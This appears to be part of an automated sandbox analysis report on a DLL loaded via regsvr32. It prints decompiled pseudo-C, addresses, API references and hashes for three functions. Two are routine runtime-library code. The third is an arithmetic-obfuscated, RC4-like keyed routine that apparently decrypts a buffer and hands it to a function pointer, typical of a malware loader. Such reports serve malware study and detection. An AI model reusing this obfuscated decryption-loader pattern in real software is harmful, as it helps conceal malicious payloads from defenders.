				if(_t23 == 0) {
					L9:
					return E6DA5C95D(_t8);
				}
				if( *0x6da8783c != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x6da85fbc, 0, ??); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E6DA5CC92(_t31);
						 *_t10 = E6DA5CC50(GetLastError());
					}
					goto L9;
				}
				E6DA641AD(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E6DA641E0(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E6DA64210();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E6DA5AA8E();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x6da5aa38
0x6da5aa3a
0x6da5aa3f
0x6da5aa44
0x6da5aa49
0x6da5aac0
0x6da5aac5
0x6da5aac5
0x6da5aa52
0x6da5aa97
0x6da5aa98
0x6da5aaa0
0x6da5aaa6
0x6da5aaa8
0x6da5aaaa
0x6da5aabd
0x6da5aabf
0x00000000
0x6da5aaa8
0x6da5aa56
0x6da5aa5c
0x6da5aa61
0x6da5aa67
0x6da5aa6c
0x6da5aa6e
0x6da5aa6f
0x6da5aa70
0x6da5aa76
0x6da5aa77
0x6da5aa7e
0x6da5aa87
0x00000000
0x6da5aa89
0x6da5aa89
0x00000000
0x6da5aa89

APIs

__lock.LIBCMT ref: 6DA5AA56

Part of subcall function 6DA641AD: __mtinitlocknum.LIBCMT ref: 6DA641C3
Part of subcall function 6DA641AD: __amsg_exit.LIBCMT ref: 6DA641CF
Part of subcall function 6DA641AD: EnterCriticalSection.KERNEL32(00000000,00000000,?,6DA5F773,0000000D,6DA7EC30,00000008,6DA5F86A,00000000,?,6DA5ADF0,00000000,?,?,?,6DA5AE53), ref: 6DA641D7

___sbh_find_block.LIBCMT ref: 6DA5AA61
___sbh_free_block.LIBCMT ref: 6DA5AA70
HeapFree.KERNEL32(00000000,00000000,6DA7E990), ref: 6DA5AAA0
GetLastError.KERNEL32(?,6DA63E6D,00000000,00000001,00000000,?,6DA64137,00000018,6DA7ECF8,0000000C,6DA641C8,00000000,00000000,?,6DA5F773,0000000D), ref: 6DA5AAB1

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 118b32ab9d05a3b310823b70fdc59aebdf3f6001280fa4d41c8ce16e1dbe7ae1
Instruction ID: 06955d6807aa732fcdb24919f0f89d6dc022859ed1e51c5388fe13224f263981
Opcode Fuzzy Hash: 118b32ab9d05a3b310823b70fdc59aebdf3f6001280fa4d41c8ce16e1dbe7ae1
Instruction Fuzzy Hash: A801A235A0D313EAEB215BB19A04F6E3B71AF02369F158809E714A60C0CB35A5E0CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4672E Relevance: 6.1, APIs: 4, Instructions: 57
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E6DA4672E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __ecx;
				_t45 = __ebx;
				_push(4);
				E6DA5C80D(E6DA6E3E5, __ebx, __edi, __esi);
				_t52 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E6DA46DE0(__ebx, __ecx, __edi, __ecx, _t54); // executed
				 *((intOrPtr*)(_t53 - 4)) = 0;
				 *_t52 = 0x6da73074;
				_t55 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					 *((intOrPtr*)(_t52 + 0x50)) = 0;
				} else {
					_t44 = E6DA5D516( *((intOrPtr*)(_t53 + 8)));
					_pop(_t47);
					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
				}
				_t46 = E6DA4984E(_t45, 0, _t52, _t55);
				_t56 = _t46;
				if(_t46 == 0) {
					L4:
					E6DA44898(_t47);
				}
				_t7 = _t46 + 0x74; // 0x74
				_t47 = _t7;
				_t37 = E6DA46432(_t46, _t7, 0, _t52, _t56);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t46 + 4)) = _t52;
				 *((short*)(_t52 + 0x92)) = 0;
				 *((short*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x44)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x64)) = 0;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x54)) = 0;
				 *((intOrPtr*)(_t52 + 0x60)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0x58)) = 0;
				 *((intOrPtr*)(_t52 + 0x48)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0x74)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
				return E6DA5C8E5(_t52);
			}

0x6da4672e
0x6da4672e
0x6da4672e
0x6da4672e
0x6da46735
0x6da4673a
0x6da4673c
0x6da4673f
0x6da46746
0x6da46749
0x6da4674f
0x6da46752
0x6da46762
0x6da46754
0x6da46757
0x6da4675c
0x6da4675d
0x6da4675d
0x6da4676a
0x6da4676c
0x6da4676e
0x6da46770
0x6da46770
0x6da46770
0x6da46775
0x6da46775
0x6da46778
0x6da4677f
0x00000000
0x00000000
0x6da46781
0x6da4678a
0x6da46793
0x6da46796
0x6da4679b
0x6da467a2
0x6da467a9
0x6da467ac
0x6da467af
0x6da467b2
0x6da467b5
0x6da467b8
0x6da467bb
0x6da467c1
0x6da467c4
0x6da467c7
0x6da467cd
0x6da467d3
0x6da467d9
0x6da467dc
0x6da467df
0x6da467e5
0x6da467eb
0x6da467ee
0x6da467f1
0x6da46802

APIs

__EH_prolog3.LIBCMT ref: 6DA46735

Part of subcall function 6DA46DE0: __EH_prolog3.LIBCMT ref: 6DA46DE7

__strdup.LIBCMT ref: 6DA46757
GetCurrentThread.KERNEL32(00000004,6DA25EC1,00000000), ref: 6DA46784
GetCurrentThreadId.KERNEL32 ref: 6DA4678D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 837ed9e8f93059c3235cee53fa979bf1bb412b1a5515e57d2b0c15e3cc06a4c5
Instruction ID: 4742e1d436bb7bae4431d40f5424dd1b7dc5ef0d98d538aac5a68ac3b9f0c782
Opcode Fuzzy Hash: 837ed9e8f93059c3235cee53fa979bf1bb412b1a5515e57d2b0c15e3cc06a4c5
Instruction Fuzzy Hash: 15217FB4809B508AC7218F7A8244286FBF8BFA4704F15890FD2AAC7721D7B0A481CF45

Uniqueness

Uniqueness Score: -1.00%

Function 6DA28380 Relevance: 3.8, APIs: 2, Instructions: 785
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 36%

			E6DA28380(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v9;
				void* _v16;
				signed int _v20;
				signed int _t59;
				signed int _t62;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t107;
				signed int _t113;
				signed int _t115;
				signed int _t121;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				signed int _t159;
				signed int _t162;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t305;
				signed int _t307;
				signed int _t309;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t350;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t377;
				signed int _t383;
				signed int _t390;
				signed int _t393;
				signed int _t396;
				signed int _t398;
				signed int _t401;
				signed int _t418;
				signed int _t424;
				signed int _t427;
				signed int _t429;
				signed int _t431;
				signed int _t453;
				signed int _t456;
				signed int _t458;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t472;
				signed int _t474;
				signed int _t476;
				signed int _t478;
				signed int _t481;
				signed int _t484;
				signed int _t487;
				signed int _t490;
				signed int _t492;
				signed int _t495;
				signed int _t498;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t509;
				signed int _t512;
				signed int _t515;
				signed int _t518;
				signed int _t520;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				signed int _t532;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				signed int _t543;
				signed int _t546;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t555;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				signed int _t563;
				signed int _t565;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				signed int _t576;
				signed int _t578;
				signed int _t585;
				signed int _t587;
				signed int _t589;
				signed int _t592;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t619;
				signed int _t629;
				signed int _t633;
				signed int _t636;
				signed int _t653;
				signed int _t656;
				signed int _t659;
				signed int _t661;
				signed int _t664;
				signed int _t677;
				signed int _t699;
				signed int _t702;
				signed int _t704;
				signed int _t706;
				signed int _t737;
				signed int _t758;
				signed int _t760;
				signed int _t762;
				signed int _t764;
				signed int _t766;
				signed int _t768;
				signed int _t770;
				signed int _t772;
				signed int _t774;
				signed int _t776;
				signed int _t778;
				signed int _t780;

				_v8 = 0;
				_v20 = 0;
				_t323 =  *0x6da81268; // 0x0
				_t585 =  *0x6da8126c; // 0x0
				_t59 =  *0x6da81270; // 0x0
				_t587 =  *0x6da8126c; // 0x0
				_t62 =  *0x6da81268; // 0x0
				_t343 =  *0x6da8126c; // 0x0
				_t589 =  *0x6da81270; // 0x0
				_t345 =  *0x6da8126c; // 0x0
				_t592 =  *0x6da81268; // 0x0
				_t82 =  *0x6da8126c; // 0x0
				_t347 =  *0x6da81270; // 0x0
				_t84 =  *0x6da8126c; // 0x0
				_t350 =  *0x6da81268; // 0x0
				_t612 =  *0x6da8126c; // 0x0
				_t86 =  *0x6da81270; // 0x0
				_t614 =  *0x6da8126c; // 0x0
				_t89 =  *0x6da81268; // 0x0
				_t370 =  *0x6da8126c; // 0x0
				_t616 =  *0x6da81270; // 0x0
				_t372 =  *0x6da8126c; // 0x0
				_t107 = malloc(_t89 *  *0x6da81268 *  *0x6da81260 + _t350 *  *0x6da81268 *  *0x6da81260 + _t592 *  *0x6da81268 *  *0x6da81260 + _t62 *  *0x6da81268 *  *0x6da81260 + _t323 *  *0x6da81268 *  *0x6da81260 + 0x1df7 -  *0x6da81260 +  *0x6da81260 + _t585 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 + _t59 *  *0x6da8126c *  *0x6da81264 - _t587 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81264 +  *0x6da8125c +  *0x6da81268 -  *0x6da8126c -  *0x6da81260 +  *0x6da81260 + _t343 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 + _t589 *  *0x6da8126c *  *0x6da81264 - _t345 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81264 +  *0x6da8125c +  *0x6da81268 -  *0x6da8126c -  *0x6da81260 +  *0x6da81260 + _t82 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 + _t347 *  *0x6da8126c *  *0x6da81264 - _t84 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81264 +  *0x6da8125c +  *0x6da81268 -  *0x6da8126c -  *0x6da81260 +  *0x6da81260 + _t612 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 + _t86 *  *0x6da8126c *  *0x6da81264 - _t614 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81264 +  *0x6da8125c +  *0x6da81268 -  *0x6da8126c -  *0x6da81260 +  *0x6da81260 + _t370 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 + _t616 *  *0x6da8126c *  *0x6da81264 - _t372 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81264 +  *0x6da8125c +  *0x6da81268 -  *0x6da8126c); // executed
				_v16 = _t107;
				_v9 = 0;
				_v8 = 0;
				while(1) {
					_t374 =  *0x6da81270; // 0x0
					_t619 =  *0x6da8125c; // 0x0
					_t113 =  *0x6da81268; // 0x0
					_t377 =  *0x6da81264; // 0x0
					_t629 =  *0x6da81268; // 0x0
					_t115 =  *0x6da81270; // 0x0
					_t383 =  *0x6da8126c; // 0x0
					if(_v8 >= _t115 *  *0x6da8126c + _t377 *  *0x6da81264 + _t619 *  *0x6da81260 + 0x1df7 -  *0x6da81270 +  *0x6da81264 + _t374 *  *0x6da8126c *  *0x6da81264 +  *0x6da8126c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 +  *0x6da8125c +  *0x6da8126c + _t113 *  *0x6da81270 +  *0x6da81260 +  *0x6da8125c - _t629 *  *0x6da81268 *  *0x6da81260 +  *0x6da8126c - _t383 *  *0x6da81264 -  *0x6da81270) {
						break;
					}
					_t305 =  *0x6da81268; // 0x0
					_t576 =  *0x6da81264; // 0x0
					_t307 =  *0x6da8126c; // 0x0
					_t578 =  *0x6da81270; // 0x0
					_t309 =  *0x6da8125c; // 0x0
					 *((char*)(_t309 *  *0x6da81264 + _a4 + _v8 -  *0x6da8126c +  *0x6da81268 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 +  *0x6da81260 +  *0x6da81270 -  *0x6da81260 -  *0x6da81264 +  *0x6da81260 +  *0x6da8126c - _t305 *  *0x6da81268 -  *0x6da8126c + _t576 *  *0x6da8125c -  *0x6da8126c +  *0x6da81260 + _t307 *  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 - _t578 *  *0x6da81264 -  *0x6da81270)) = _v8;
					_t314 =  *0x6da8126c; // 0x0
					_t316 =  *0x6da81268; // 0x0
					_t318 =  *0x6da8126c; // 0x0
					_t320 =  *0x6da81268; // 0x0
					 *((char*)(_v16 + _t320 *  *0x6da8125c + _v8 - _t314 *  *0x6da81264 + _t316 *  *0x6da8125c - _t318 *  *0x6da81264)) =  *((intOrPtr*)(_a8 + _v8 % _a12));
					_v8 = _v8 + 1;
				}
				_v8 = 0;
				while(_v8 < 0x1df7) {
					_t633 =  *0x6da81260; // 0x0
					_t121 =  *0x6da81270; // 0x0
					_t636 =  *0x6da81260; // 0x0
					_t124 =  *0x6da81270; // 0x0
					_t390 =  *0x6da81264; // 0x0
					_t126 =  *0x6da81260; // 0x0
					_t393 =  *0x6da81270; // 0x0
					_t129 =  *0x6da81260; // 0x0
					_t396 =  *0x6da81270; // 0x0
					_t653 =  *0x6da81264; // 0x0
					_t398 =  *0x6da81260; // 0x0
					_t656 =  *0x6da81270; // 0x0
					_t401 =  *0x6da81260; // 0x0
					_t659 =  *0x6da81270; // 0x0
					_t146 =  *0x6da81264; // 0x0
					_t661 =  *0x6da81260; // 0x0
					_t149 =  *0x6da81270; // 0x0
					_t664 =  *0x6da81260; // 0x0
					_t152 =  *0x6da81270; // 0x0
					_t418 =  *0x6da81264; // 0x0
					_t677 =  *0x6da81260; // 0x0
					_t424 =  *0x6da81260; // 0x0
					_t427 =  *0x6da81264; // 0x0
					_t429 =  *0x6da8126c; // 0x0
					_t431 =  *0x6da81260; // 0x0
					_t699 =  *0x6da81260; // 0x0
					_t702 =  *0x6da81264; // 0x0
					_t704 =  *0x6da8126c; // 0x0
					_t706 =  *0x6da81260; // 0x0
					_t453 =  *0x6da81260; // 0x0
					_t456 =  *0x6da81264; // 0x0
					_t458 =  *0x6da8126c; // 0x0
					asm("cdq");
					_v20 = (( *(_a4 + _t664 *  *0x6da8126c + _t401 *  *0x6da8126c + _t129 *  *0x6da8126c + _t636 *  *0x6da8126c + _v8 +  *0x6da81260 + _t633 *  *0x6da81268 *  *0x6da8125c - _t121 *  *0x6da81260 *  *0x6da81264 +  *0x6da81264 +  *0x6da81260 + _t124 *  *0x6da81268 -  *0x6da8126c -  *0x6da8126c +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c - _t390 *  *0x6da81270 *  *0x6da81264 -  *0x6da8126c +  *0x6da81260 + _t126 *  *0x6da81268 *  *0x6da8125c - _t393 *  *0x6da81260 *  *0x6da81264 +  *0x6da81264 +  *0x6da81260 + _t396 *  *0x6da81268 -  *0x6da8126c -  *0x6da8126c +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c - _t653 *  *0x6da81270 *  *0x6da81264 -  *0x6da8126c +  *0x6da81260 + _t398 *  *0x6da81268 *  *0x6da8125c - _t656 *  *0x6da81260 *  *0x6da81264 +  *0x6da81264 +  *0x6da81260 + _t659 *  *0x6da81268 -  *0x6da8126c -  *0x6da8126c +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c - _t146 *  *0x6da81270 *  *0x6da81264 -  *0x6da8126c +  *0x6da81260 + _t661 *  *0x6da81268 *  *0x6da8125c - _t149 *  *0x6da81260 *  *0x6da81264 +  *0x6da81264 +  *0x6da81260 + _t152 *  *0x6da81268 -  *0x6da8126c -  *0x6da8126c +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c - _t418 *  *0x6da81270 *  *0x6da81264 -  *0x6da8126c) & 0x000000ff) + _v20 +  *((char*)(_v16 + _t706 *  *0x6da81260 + _t431 *  *0x6da81260 + _t677 *  *0x6da81260 + _v8 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 -  *0x6da8126c +  *0x6da81264 -  *0x6da81270 + _t424 *  *0x6da81264 *  *0x6da81264 -  *0x6da81260 -  *0x6da8126c -  *0x6da8126c -  *0x6da81268 +  *0x6da81260 - _t427 *  *0x6da8126c +  *0x6da81260 - _t429 *  *0x6da8126c -  *0x6da8126c -  *0x6da81268 -  *0x6da81268 -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 -  *0x6da8126c +  *0x6da81264 -  *0x6da81270 + _t699 *  *0x6da81264 *  *0x6da81264 -  *0x6da81260 -  *0x6da8126c -  *0x6da8126c -  *0x6da81268 +  *0x6da81260 - _t702 *  *0x6da8126c +  *0x6da81260 - _t704 *  *0x6da8126c -  *0x6da8126c -  *0x6da81268 -  *0x6da81268 -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 -  *0x6da8126c +  *0x6da81264 -  *0x6da81270 + _t453 *  *0x6da81264 *  *0x6da81264 -  *0x6da81260 -  *0x6da8126c -  *0x6da8126c -  *0x6da81268 +  *0x6da81260 - _t456 *  *0x6da8126c +  *0x6da81260 - _t458 *  *0x6da8126c -  *0x6da8126c -  *0x6da81268 -  *0x6da81268 -  *0x6da81270))) % 0x1df7;
					_t159 =  *0x6da81270; // 0x0
					_t462 =  *0x6da8126c; // 0x0
					_t162 =  *0x6da81264; // 0x0
					_t464 =  *0x6da81270; // 0x0
					_t737 =  *0x6da8126c; // 0x0
					_t467 =  *0x6da81264; // 0x0
					_v9 =  *((intOrPtr*)(_a4 + _t467 *  *0x6da8125c + _t162 *  *0x6da8125c + _v8 -  *0x6da81270 + _t159 *  *0x6da81268 *  *0x6da81268 -  *0x6da8126c -  *0x6da81270 -  *0x6da81260 -  *0x6da81270 + _t462 *  *0x6da81260 +  *0x6da8126c -  *0x6da81270 + _t464 *  *0x6da81268 *  *0x6da81268 -  *0x6da8126c -  *0x6da81270 -  *0x6da81260 -  *0x6da81270 + _t737 *  *0x6da81260 +  *0x6da8126c));
					_t470 =  *0x6da81270; // 0x0
					_t174 =  *0x6da81268; // 0x0
					_t472 =  *0x6da81270; // 0x0
					_t176 =  *0x6da81268; // 0x0
					_t474 =  *0x6da81270; // 0x0
					_t178 =  *0x6da81268; // 0x0
					_t476 =  *0x6da81270; // 0x0
					_t180 =  *0x6da81268; // 0x0
					_t478 =  *0x6da81270; // 0x0
					_t481 =  *0x6da81270; // 0x0
					_t484 =  *0x6da8126c; // 0x0
					_t487 =  *0x6da81270; // 0x0
					_t490 =  *0x6da81264; // 0x0
					_t492 =  *0x6da81270; // 0x0
					_t495 =  *0x6da81270; // 0x0
					_t498 =  *0x6da8126c; // 0x0
					_t501 =  *0x6da81270; // 0x0
					_t504 =  *0x6da81264; // 0x0
					_t506 =  *0x6da81270; // 0x0
					_t509 =  *0x6da81270; // 0x0
					_t512 =  *0x6da8126c; // 0x0
					_t515 =  *0x6da81270; // 0x0
					_t518 =  *0x6da81264; // 0x0
					_t520 =  *0x6da81270; // 0x0
					_t523 =  *0x6da81270; // 0x0
					_t526 =  *0x6da8126c; // 0x0
					_t529 =  *0x6da81270; // 0x0
					_t532 =  *0x6da81264; // 0x0
					_t534 =  *0x6da81270; // 0x0
					_t537 =  *0x6da81270; // 0x0
					_t540 =  *0x6da8126c; // 0x0
					_t543 =  *0x6da81270; // 0x0
					_t546 =  *0x6da81264; // 0x0
					 *((char*)(_t546 *  *0x6da8126c + _a4 + _v8 - _t478 *  *0x6da8126c *  *0x6da81260 +  *0x6da81270 - _t481 *  *0x6da81260 *  *0x6da81268 + _t484 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t487 *  *0x6da8126c *  *0x6da8125c + _t490 *  *0x6da8126c - _t492 *  *0x6da8126c *  *0x6da81260 +  *0x6da81270 - _t495 *  *0x6da81260 *  *0x6da81268 + _t498 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t501 *  *0x6da8126c *  *0x6da8125c + _t504 *  *0x6da8126c - _t506 *  *0x6da8126c *  *0x6da81260 +  *0x6da81270 - _t509 *  *0x6da81260 *  *0x6da81268 + _t512 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t515 *  *0x6da8126c *  *0x6da8125c + _t518 *  *0x6da8126c - _t520 *  *0x6da8126c *  *0x6da81260 +  *0x6da81270 - _t523 *  *0x6da81260 *  *0x6da81268 + _t526 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t529 *  *0x6da8126c *  *0x6da8125c + _t532 *  *0x6da8126c - _t534 *  *0x6da8126c *  *0x6da81260 +  *0x6da81270 - _t537 *  *0x6da81260 *  *0x6da81268 + _t540 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t543 *  *0x6da8126c *  *0x6da8125c)) =  *((intOrPtr*)(_a4 + _v20 - _t470 *  *0x6da81270 -  *0x6da8126c - _t174 *  *0x6da81260 -  *0x6da81270 - _t472 *  *0x6da81270 -  *0x6da8126c - _t176 *  *0x6da81260 -  *0x6da81270 - _t474 *  *0x6da81270 -  *0x6da8126c - _t178 *  *0x6da81260 -  *0x6da81270 - _t476 *  *0x6da81270 -  *0x6da8126c - _t180 *  *0x6da81260 -  *0x6da81270));
					_t549 =  *0x6da81260; // 0x0
					_t758 =  *0x6da8126c; // 0x0
					_t551 =  *0x6da81264; // 0x0
					_t760 =  *0x6da81270; // 0x0
					_t553 =  *0x6da81270; // 0x0
					_t762 =  *0x6da81260; // 0x0
					_t555 =  *0x6da8126c; // 0x0
					_t764 =  *0x6da81264; // 0x0
					_t557 =  *0x6da81270; // 0x0
					_t766 =  *0x6da81270; // 0x0
					_t559 =  *0x6da81260; // 0x0
					_t768 =  *0x6da8126c; // 0x0
					_t561 =  *0x6da81264; // 0x0
					_t770 =  *0x6da81270; // 0x0
					_t563 =  *0x6da81270; // 0x0
					_t772 =  *0x6da81260; // 0x0
					_t565 =  *0x6da8126c; // 0x0
					_t774 =  *0x6da81264; // 0x0
					_t567 =  *0x6da81270; // 0x0
					_t776 =  *0x6da81270; // 0x0
					_t569 =  *0x6da81260; // 0x0
					_t778 =  *0x6da8126c; // 0x0
					_t571 =  *0x6da81264; // 0x0
					_t780 =  *0x6da81270; // 0x0
					_t573 =  *0x6da81270; // 0x0
					 *((char*)(_a4 + _v20 +  *0x6da8126c +  *0x6da81270 - _t549 *  *0x6da81264 +  *0x6da8126c +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 -  *0x6da81268 - _t758 *  *0x6da81264 + _t551 *  *0x6da81260 - _t760 *  *0x6da81264 - _t553 *  *0x6da8126c +  *0x6da8126c +  *0x6da81270 - _t762 *  *0x6da81264 +  *0x6da8126c +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 -  *0x6da81268 - _t555 *  *0x6da81264 + _t764 *  *0x6da81260 - _t557 *  *0x6da81264 - _t766 *  *0x6da8126c +  *0x6da8126c +  *0x6da81270 - _t559 *  *0x6da81264 +  *0x6da8126c +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 -  *0x6da81268 - _t768 *  *0x6da81264 + _t561 *  *0x6da81260 - _t770 *  *0x6da81264 - _t563 *  *0x6da8126c +  *0x6da8126c +  *0x6da81270 - _t772 *  *0x6da81264 +  *0x6da8126c +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 -  *0x6da81268 - _t565 *  *0x6da81264 + _t774 *  *0x6da81260 - _t567 *  *0x6da81264 - _t776 *  *0x6da8126c +  *0x6da8126c +  *0x6da81270 - _t569 *  *0x6da81264 +  *0x6da8126c +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 +  *0x6da81264 -  *0x6da81268 - _t778 *  *0x6da81264 + _t571 *  *0x6da81260 - _t780 *  *0x6da81264 - _t573 *  *0x6da8126c)) = _v9;
					_v8 = _v8 + 1;
				}
				return  *0x6da83d4c(_v16);
			}

0x6da28387
0x6da2838e
0x6da283a0
0x6da283bc
0x6da283d7
0x6da283ec
0x6da28437
0x6da28452
0x6da2846d
0x6da28483
0x6da284ce
0x6da284ea
0x6da28504
0x6da2851a
0x6da28564
0x6da28580
0x6da2859b
0x6da285b0
0x6da285fb
0x6da28616
0x6da28631
0x6da28647
0x6da2868d
0x6da28696
0x6da28699
0x6da2869d
0x6da286af
0x6da286c0
0x6da286d6
0x6da28709
0x6da28717
0x6da28732
0x6da28748
0x6da2875c
0x6da28774
0x00000000
0x00000000
0x6da287bf
0x6da287d3
0x6da287ee
0x6da28814
0x6da28829
0x6da2883b
0x6da28846
0x6da28857
0x6da28865
0x6da28873
0x6da28888
0x6da286ac
0x6da286ac
0x6da28890
0x6da288a2
0x6da288b8
0x6da288ce
0x6da288e3
0x6da288fe
0x6da28930
0x6da28952
0x6da28967
0x6da2897d
0x6da28997
0x6da289ca
0x6da289ec
0x6da28a02
0x6da28a18
0x6da28a33
0x6da28a66
0x6da28a87
0x6da28a9d
0x6da28ab2
0x6da28acd
0x6da28aff
0x6da28b2e
0x6da28b5b
